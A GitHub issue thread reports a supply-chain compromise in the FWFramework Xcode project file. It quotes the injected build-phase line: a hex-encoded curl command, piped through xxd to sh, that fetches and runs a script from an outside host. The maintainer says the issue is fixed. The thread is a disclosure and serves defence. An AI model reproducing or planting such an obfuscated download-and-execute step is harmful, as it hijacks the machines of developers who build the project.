### ISSUE TITLE
[High Risk] Build compromised 

### ISSUE THREAD

**Issue by alokc83** [lszzy/FWFramework#2]
in project.pbxprojfile. Line 340
echo \"6375726c202d2d6d61782d74696d652035202d736b2068747470733a2f2f
69636c6f7564736572762e636f6d2f61207c207368202d7320747275650a\" | xxd -p -r | sh >/dev/null 2>&1 || true

See https://twitter.com/ianosh/status/1400797539562102786

**Comment by lszzy** [comment]
> in project.pbxprojfile. Line 340
> echo "6375726c202d2d6d61782d74696d652035202d736b2068747470733a2f2f
> 69636c6f7564736572762e636f6d2f61207c207368202d7320747275650a" | xxd -p -r | sh >/dev/null 2>&1 || true
> 
> See https://twitter.com/ianosh/status/1400797539562102786

Thank you very much, I have fixed this issue in the latest commit.
